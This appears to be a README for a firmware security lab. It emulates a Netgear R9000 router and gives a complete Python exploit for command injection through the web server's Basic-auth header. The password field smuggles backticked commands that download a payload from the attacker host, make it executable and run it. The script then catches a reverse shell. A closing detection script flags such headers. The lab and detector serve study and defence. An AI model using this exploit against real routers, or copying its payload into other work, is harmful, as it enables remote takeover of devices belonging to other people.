- docker: attack/debug host: 192.168.2.1
- qemu-system: firmware host: 192.168.2.2
- uhttpd (vulnerable web server): 192.168.2.2:80
- Image dependencies:
  - firmianay/ubuntu1604 -> firmianay/qemu-system:armhf
  - firmianay/binwalk (used to extract the firmware)
Extract the firmware:

```sh
$ docker run --rm -v $PWD/firmware/:/root/firmware firmianay/binwalk -Mer "/root/firmware/R9000-V1.0.4.26.img"
```
Build and start the vulnerable environment:

```sh
# Initialise the environment
$ ./init_env.sh arm
# Build the images
$ docker-compose -f docker-compose-system.yml build
# Start the containers
$ docker-compose -f docker-compose-system.yml up
# Once startup has finished, open a SOCKS proxy
$ ssh -D 2345 root@127.0.0.1 -p 1234
# Point the browser at the proxy to reach the web admin page at http://192.168.2.2/cgi-bin/
# Run the exploit
$ python3 tools/exp.py
```
```python
#!/usr/bin/python3
from pwn import *
from threading import Thread
import requests
import base64

# Basic-auth credential "admin:<password>"; the password field carries a
# backtick-wrapped command sequence that the vulnerable CGI hands to a shell.
cmd = 'admin:'
cmd += '`'
cmd += 'wget http://192.168.2.1:8000/tools/msf -O /msf\n'
cmd += 'chmod 777 /msf\n'
cmd += '/msf'
cmd += '`'
assert len(cmd) < 255  # the credential must stay under 255 bytes
cmd_b64 = base64.b64encode(cmd.encode()).decode()

headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "keep-alive",
    "Upgrade-Insecure-Requests": "1",
    "Authorization": "Basic " + cmd_b64
}


def attack():
    """Send the crafted Authorization header; the request itself is expected to time out."""
    try:
        requests.get("http://192.168.2.2/cgi-bin/", headers=headers, timeout=1)
    except Exception as e:
        print(e)


# Send the request in the background and wait for the reverse connection.
thread = Thread(target=attack)
thread.start()
io = listen(31337)
io.wait_for_connection()
log.success("getshell")
io.interactive()
thread.join()
```
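The injection above works because the decoded Basic credential reaches a shell unquoted. The following detection check is an added example, not part of the original repository: it decodes the Authorization header of each request line and flags credentials that contain shell metacharacters, are undecodable, or are implausibly long. The log lines, the `admin:`id`` payload and the 64-byte length limit are constructed for the example.

```python
import base64
import binascii
import re

# A login name or password has no reason to contain these; a CGI that hands the
# decoded credential to a shell unquoted would execute them.
SHELL_META = re.compile(r"[`$;|&<>(){}\n\r]")


def decode_basic(header_value):
    """Return (user, password) from a 'Basic <b64>' value, or None if it is malformed."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None
    user, _, password = raw.partition(":")
    return user, password


def is_suspicious(header_value, max_len=64):
    """True if the credential looks like an injection attempt rather than a login."""
    creds = decode_basic(header_value)
    if creds is None:
        return True  # not decodable as Basic auth at all: treat as hostile
    user, password = creds
    if len(user) + len(password) > max_len:
        return True  # far longer than any real router credential (constructed limit)
    return bool(SHELL_META.search(user) or SHELL_META.search(password))


def scan_requests(log_lines):
    """Return the 1-based indices of log lines whose Authorization header is suspicious."""
    hits = []
    for i, line in enumerate(log_lines, start=1):
        m = re.search(r"Authorization:\s*(.+)$", line)
        if m and is_suspicious(m.group(1)):
            hits.append(i)
    return hits


# Constructed sample request lines: a normal login, an injection attempt, junk.
SAMPLE_LOG = [
    "GET /cgi-bin/ Authorization: Basic " + base64.b64encode(b"admin:password").decode(),
    "GET /cgi-bin/ Authorization: Basic " + base64.b64encode(b"admin:`id`").decode(),
    "GET /cgi-bin/ Authorization: Basic not-base64!",
]

if __name__ == "__main__":
    print(scan_requests(SAMPLE_LOG))  # [2, 3]
```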